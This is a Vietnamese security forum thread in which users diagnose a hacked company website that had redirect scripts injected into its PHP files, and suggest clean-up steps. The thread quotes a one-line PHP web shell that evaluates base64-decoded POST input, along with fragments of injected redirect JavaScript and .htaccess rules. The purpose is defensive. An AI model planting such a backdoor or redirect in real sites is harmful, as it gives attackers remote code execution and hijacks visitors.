Tôi thì cho là chuyện này xuất phát từ việc một số các Theme hay Plugin được cài trong các bản Wordpress , joomla, Dupral này do một nhóm phát triển và họ đã âm thầm cấy mã độc vào ( hoặc các Plugin này có lỗi ). Chuyện này không phải hiếm vì trước đây thời IPB còn thịnh hành, tôi từng chứng kiến không ít các themes của IPB đã bị cài mã độc bên trong CSS, PHP , javascript Điểm đáng chú ý là các cuộc tấn công hầu hết xoay quanh 3 web app chính là Wordpress, joomla và dupral , theo tôi biết thì 3 web app có nhiều thành phần mã được dùng lại của nhau và nhiều plugin 3rd party được tái cấu trúc lại cho cả 3 web app. Biện pháp tôi đề nghị bây giờ là tối giản hóa các plugin không cần thiết trên webapp , dùng Dreamwaver , notepad++ hay bất kì trình editor nào hồ trợ kiếm string trong 1 thư mục để thực hiện tìm kiếm các đoạn eval(base64_encode( và xóa chúng đi ( mã nguồn gốc ít ai viết cái thứ này vào để làm gì Xóa các file lạ như là cái post.php bằng cách so sán bản hiện nay và bản backup trọn bộ các file lúc ban đầu chưa có gì xảy ra. Nếu có thể dựng máy ảo chạy *nix ( vì bồ nói là không thể chuyển qua *nix) làm webserver ( chỉ webserver ) vì *nix nếu config đúng sẽ giúp hạn chế tối đa khả năng phá hoại của các virus dạng này 

<?php eval (base64_decode($_POST["php"]));?>

<?php printf "Server is being maintained, please come back later..." ; ?>

<script type='text Javascript'>document.location.href='http:

RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://...

set_magic_quotes_runtime

Nếu có thể dựng máy ảo chạy *nix ( vì bồ nói là không thể chuyển qua *nix) làm webserver ( chỉ webserver ) vì *nix nếu config đúng sẽ giúp hạn chế tối đa khả năng phá hoại của các virus dạng này 

News...... Đã có vô vàn đợt attack tiếp thep. Tôi sẽ đưa ra log cho anh em tham khảo sau. Nhưng bây giờ mình thảo luận 1 tí. Đây có phải là 1 loại attack ko? Code:

58.186.220.205 - - [06/Dec/2010:15:16:28 +0700] "POST /howwework-open.php HTTP/1.1" 200 898
113.22.168.141 - - [06/Dec/2010:16:31:56 +0700] "POST /contact.php HTTP/1.1" 200 2337
113.161.74.114 - - [06/Dec/2010:14:56:28 +0700] "POST /howwework-strong.php HTTP/1.1" 200 2523
58.186.119.175 - - [06/Dec/2010:14:45:02 +0700] "POST /portfolio.php HTTP/1.1" 200 1920

Sau đây là những yếu tố để xét xem có phải là attack ko: 1. Web của công ty là web bình thường, không có forum gì cả, cũng không cho khả năng modify nội dung. 2. Người có thể Modify nội dung thì ngồi trong công ty, sử dụng "cms" có sẵn của website. Nhưng những ip trên không thuộc range IP mà công ty đang thuê. 3. Những file mà IP trên cố gắng post vào đều chẳng phải những file cần update. Công ty chỉ update Images là đa số. 

- Thứ nhất, với HTTP status 200 của 4 request trên chứng tỏ những php file ấy tồn tại. - Thứ nhì, những fles đó nằm ngay "context" root (/). Điều này có nghĩa những file ấy tồn tại để cho mọi người có thể access. Nếu không thì access đến những php đó sẽ đòi hỏi authentication rồi sau đó mới thực hiện chuyện gì đó sau. Bởi thế, việc access đến các php ấy có HTTP status 200 (để đi tới bước authentication) là chuyện bình thường. Bồ nên xác nhận các php đó available cho mọi người access hay không? - Thứ ba, log format của các log trên thuộc dạng đơn giản nên không ghi nhận kích thước của các "POST". Bởi vậy, khó xác định được những request ấy là "tấn công" hay sử dụng bình thường. - Thứ tư, nếu không nắm được chức năng và cấu trúc của web application của bồ thì khó lòng mà đoán được chuyện gì xảy ra với vỏn vẹn 4 dòng log ngắn gọn như trên. 

conmale wrote:

- Thứ nhất, với HTTP status 200 của 4 request trên chứng tỏ những php file ấy tồn tại. - Thứ nhì, những fles đó nằm ngay "context" root (/). Điều này có nghĩa những file ấy tồn tại để cho mọi người có thể access. Nếu không thì access đến những php đó sẽ đòi hỏi authentication rồi sau đó mới thực hiện chuyện gì đó sau. Bởi thế, việc access đến các php ấy có HTTP status 200 (để đi tới bước authentication) là chuyện bình thường. Bồ nên xác nhận các php đó available cho mọi người access hay không? - Thứ ba, log format của các log trên thuộc dạng đơn giản nên không ghi nhận kích thước của các "POST". Bởi vậy, khó xác định được những request ấy là "tấn công" hay sử dụng bình thường. - Thứ tư, nếu không nắm được chức năng và cấu trúc của web application của bồ thì khó lòng mà đoán được chuyện gì xảy ra với vỏn vẹn 4 dòng log ngắn gọn như trên. 

Hi commale, Tôi cũng biết là những file này tồn tại, và available to access (Get/Head) nhưng không cho Modify (Post). Vấn đề bồ đặt ra khá đúng: Tại sao biết những đây là những đợt attack từ những log file khá đơn giản như vậy? Bởi vì, như tôi đã nêu ở phần đầu của Topic, đó là Website đã bị attack/hack 1 lần rồi, trước đó chỉ vài ngày. Và hầu hết các file php đều bị Post 1 đoạn script lạ để Redirect đến "p3p0.com". Kế nữa, những IP thực hiện việc Post này không phải IP của người được giao nhiệm vụ Update website. Tôi đã kêu người đó thử Post và so sánh thì IP hoàn toàn khác nhau. Và nếu dùng 1 số phuơng pháp Trace thì có thể thấy 1 số IP được đưa ra trong log file trên đa số xuất phát từ nước ngoài ( Panama, Euro), chỉ khoảng 2-3 IP là từ Việt Nam. Do đó, đến đây tôi có thể nói (chỉ theo ý tôi thôi nhé ) là website tiếp tục bị Hack/attack. Thêm 1 bằng chứng nữa. Khi tôi để 1 file index.php rất đơn giàn, chỉ print 1 câu thông báo là sever đang maintained thì vẫn bị Post vào 1 dòng script lạ . Nếu ở trường hợp khác thì chắc chắn sẽ phải xem xét kĩ lại rồi mới dám đưa ra giả thuyết. Nhưng vì đặc thù của trang Web chỉ là show ra info và image về cty. Không cho comment hay post lên đó gì cả, và vì mới bị dính 1 đợt reconnaissance trước đó nên mình có thể đoán ra. Tôi đang cố gắng đưa vài cái .cap và toàn bộ log file nghi vấn lên đây cho anh em tham khảo chung luôn. Nhưng hiện giờ hơi bận. Sẽ update tình hình cho anh em liên tục. Thanks & Best Regards 

Nếu như vậy thì không phải đau đầu nhiều đâu bro. Đằng này, tôi đã xoá hết web folder rồi. Chỉ tạo mới 1 cái index.php để thông báo thôi. Kết quả thì bro biết rồi đấy :) Tình hình là bữa giờ server tạm ok. Vẫn có nhiều đợt attack vào theo kiểu cũ, nhưng do tôi đã vá lại rồi, nên cũng ko sao. Để vài hôm nữa xem thến nào rồi sẽ đưa ra kết kuận chính thức cho việc này Thanks all & Best Regards. 

Đoạn màu đỏ khá phi lý. Nếu trên trang web ấy chỉ tồn tại có mỗi index.php thì tất cả những request không đến index.php bắt buộc phải có HTTP 404 error (not found). Ví dụ, request đến /howwework-open.php phải có status là 404. 

conmale wrote:

Đoạn màu đỏ khá phi lý. Nếu trên trang web ấy chỉ tồn tại có mỗi index.php thì tất cả những request không đến index.php bắt buộc phải có HTTP 404 error (not found). Ví dụ, request đến /howwework-open.php phải có status là 404. 

Rất chính xác. Có rất nhiều là đằng khác, tại tôi chỉ point out 1 vài log mà mình muốn focus cho anh em thôi. Nói chung là nó chơi kiểu wide attack, dò và adapt 1-2 đoạn script vào tất cả các file php mà 1 trang web thông thường sẽ có, nào là index.php, main.php, common.php, phpMyadmin/scripts/setup.php, includes/post.php, etc.... Để sever thực sự đứng vững trước các đợt attack này xong, tôi sẽ post rõ ràng các log file, tình trạng cũng như cách khắc phục cho anh em ngâm cứu.  

Bồ đưa ra logs với các POST requests đến các php files có HTTP status là 200 và đồng thời lại khẳng định là bồ đã xoá hết chỉ để lại mỗi index.php. Xét về mặt kỹ thuật, đây là điều không thể xảy ra. Xét về mặt lý luận và phân tích, bồ đưa logs của trường hợp này vào trường hợp kia như vậy chỉ làm rối rắm thêm mà thôi. Nó không phải để focus mà theo tôi, đó chỉ tạo ngộ nhận và phức tạp hoá vấn đề. 

<script type='text Javascript'>document.location.href='http://.....

RewriteEngine On
 RewriteBase /
 RewriteRule ^(.*)? http://...